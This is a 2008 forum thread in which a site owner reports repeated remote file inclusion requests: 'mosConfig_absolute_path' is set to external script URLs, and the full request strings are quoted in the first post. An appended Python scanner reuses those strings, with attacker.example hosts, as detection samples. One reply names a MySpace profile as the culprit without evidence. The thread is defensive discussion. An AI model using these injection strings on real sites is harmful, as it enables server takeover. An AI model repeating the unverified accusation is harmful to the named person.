strange visitors attack or just a crawl system?



jasonxx
01-28-2008, 03:58 PM
Hi,
In the last few days I have seen visitors from many IPs that try to access my site using the following links:

1-index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://kelate.t35.com/scripts/djd.txt???

2-index.php?option=com_wrapper&Itemid=7/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://209.250.234.234/~smdemo/images/store.jpg?

Today I received 30 visitors from different IPs, and each one used that path. I am considering creating a script to block the IP of everyone who tries to access my site using that strange path :confused:
I receive visits from the Google crawler, Yahoo, AltaVista, etc.,
and none of them use that strange link. Is this an attack? Is someone trying to find some security problem, or what?
This only happens on my Hostmonster account; I have had other hosts in the past where I never saw this situation...
Does anyone know what this is?
Thanks a lot for your help
:)

McCoy
01-28-2008, 06:29 PM
It's a stupid script kiddie trying to use a rootkit.

Don't worry you're safe. I've checked the codes he's using. They won't work in Hostmonster.

If you're curious, this is the little clueless kid who's doing it:

http://www.myspace.com/matyie

If I can find this "hacker" on MySpace in less than 5 minutes, don't worry, you're pretty safe...

sjlplat
01-29-2008, 12:34 AM
I'm working on a PHP script that will log these things in detail and automatically deny access to the addresses from which they originate. It's in the development stages, so keep an eye out in the coming months. ;)

justafriend
01-30-2008, 04:51 PM
> It's a stupid script kiddie trying to use a rootkit.
>
> Don't worry you're safe. I've checked the codes he's using. They won't work in Hostmonster.
>
> If you're curious, this is the little clueless kid who's doing it:
>
> http://www.myspace.com/matyie
>
> If I can find this "hacker" on MySpace in less than 5 minutes, don't worry, you're pretty safe...

I'm curious, what is a rootkit? How could a full fledged hacker really damage my site?

rvm
01-30-2008, 06:38 PM
> I'm curious, what is a rootkit? How could a full fledged hacker really damage my site?

Root is the username used for the administrator in most *nix and Linux systems; a rootkit is a program / code / script that exploits a software / server vulnerability to obtain root access, which means administrator access.

You will see tons of rootkit / hack attempts during the day, because hackers find or code scripts that will scan full vulnerabilities randomly to a given public IP address class.

:cool:

McCoy
01-31-2008, 02:54 AM
In any case, damaging YOUR site is much easier than taking over the server (which was the intent of the hacker).

If a "hacker" wants to damage your site he/she only needs to scan or know a SQL Injection vulnerability of the script you're using, which are unfortunately fairly common in today's software. With such a vulnerability, the hacker can do many things: From changing the information showing on your page, to retrieving your administration password.

In this case, this hacker was trying to do that, but instead of damaging the site, he tried to install a rootkit through it in order to take over the server. But the code he was using was useless inside Hostmonster's environment.

sjlplat
01-31-2008, 09:50 AM
I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

justafriend
01-31-2008, 10:39 AM
> I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

Meaning this would protect us from all this rootkit crap and bigger threats? I had an old website that I had let go for a few weeks; when I came back, it was redirecting to a nazi site. Not fun.

Chella
01-31-2008, 03:31 PM
> I have a working PHP script to log and ban IP addresses associated with injection query strings. If anyone is interested, I expect to have a public release available within the week -- as soon as I complete the auto-installer. ;)

I'm interested! :D

sjlplat
02-01-2008, 08:53 AM
> Meaning this would protect us from all this rootkit crap and bigger threats? I had an old website that I had let go for a few weeks; when I came back, it was redirecting to a nazi site. Not fun.

That's correct. It will intercept injection strings before they can execute arbitrary code.

sjlplat
02-04-2008, 03:26 AM
I've released a beta version of the Injection Scanner. A download link and instructions are located at http://www.myphpscripts.net/forum/viewtopic.php?t=113
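
The request pattern from the first post and the log-and-ban idea discussed in the thread, as an added example (not part of the thread and not sjlplat's Injection Scanner): a Python scan of an access log that flags any query parameter whose value is a URL on a foreign host and groups the hits by client IP. The log lines, addresses, hostnames and the `OWN_HOSTS` allow-list are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (combined format, cut after the byte count);
# every address and hostname here is a placeholder.
SAMPLE_LOG = """\
198.51.100.7 - - [28/Jan/2008:15:01:02 -0700] "GET /index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://attacker.example/djd.txt??? HTTP/1.1" 200 512
198.51.100.8 - - [28/Jan/2008:15:01:09 -0700] "GET /index.php?option=com_wrapper&Itemid=7/index.php?option=com_content&task=&sectionid=&id=&mosConfig_absolute_path=http://203.0.113.50/~x/store.jpg? HTTP/1.1" 200 512
192.0.2.10 - - [28/Jan/2008:15:02:00 -0700] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8043
198.51.100.7 - - [28/Jan/2008:15:03:41 -0700] "GET /index.php?mosConfig_absolute_path=http%3A%2F%2Fattacker.example%2Fdjd.txt%3F HTTP/1.1" 200 512
192.0.2.44 - - [28/Jan/2008:15:04:12 -0700] "GET /index.php?option=com_user&return=http://www.mysite.example/index.php HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+)')
REMOTE_SCHEMES = ("http", "https", "ftp")
OWN_HOSTS = {"www.mysite.example"}  # assumption: hosts your own links may point at

def remote_include_params(target):
    """Return [(param, host)] for query values that are URLs on foreign hosts."""
    hits = []
    query = target.partition("?")[2]
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        try:
            parts = urlsplit(value.strip())
        except ValueError:  # malformed netloc, e.g. an unbalanced IPv6 bracket
            continue
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() in REMOTE_SCHEMES and host and host not in OWN_HOSTS:
            hits.append((name, host))
    return hits

def scan(log_text):
    """Map client IP -> list of (param, host) hits found in its requests."""
    by_ip = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            by_ip[m.group(1)].extend(remote_include_params(m.group(2)))
    return {ip: hits for ip, hits in by_ip.items() if hits}

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, len(hits), sorted(set(hits)))
```

The crawler request and the same-site `return=` link are not flagged; only the three requests carrying a foreign URL in a parameter are reported.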